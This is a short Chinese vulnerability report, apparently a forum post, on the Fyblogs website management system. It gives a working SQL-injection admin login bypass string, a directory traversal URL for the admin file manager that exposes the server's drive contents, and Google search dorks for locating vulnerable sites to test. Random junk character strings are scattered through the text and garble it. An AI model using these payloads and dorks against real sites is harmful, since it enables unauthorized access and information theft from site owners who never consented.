漏洞类型: 未授权访问/权限绕过
# `2 @: h- o2 {* Z9 e
% W& X3 E0 P/ k# j( T7 L: V" G简要描述:- K1 q3 o8 u2 S6 K( d7 c
& d. ]: D& J; L5 w0 _1 P3 E
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! `: j3 O5 S, ^
+ F4 _0 H, R; ]; R+ E6 E) A
详细说明:
/ c* \3 f0 D4 o! Z* h& D3 M3 X. }9 k7 w0 S4 i
后台万能密码 'or'='or'8 p$ ?! ]. J+ O' R* m" l# t6 G* d! p
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!5 j) j* a. E8 e+ I
admin/uploadfile.asp?currentFolder=/upfiles/../9 U1 D. Z+ d3 R+ [! ?
6 j' a' H% I o( u漏洞证明:
6 x# W6 q! \' V( e+ a7 i! K6 J' v ^7 N! Z' H
谷歌:inurl:type.asp?id=1 新闻中心
8 Q* Q0 v9 }3 E: ?; ]6 I或者 :inurl:download_ok.asp?
3 |: N9 |4 ~+ I6 t4 \
4 A) o3 ?0 Y& E$ e& I1 k D可以测试6 A- N1 g ^" u2 y* M/ c
8 M. H- [ @ ?1 u s! u% p9 D% S x$ d' s8 `1 e" A: G
|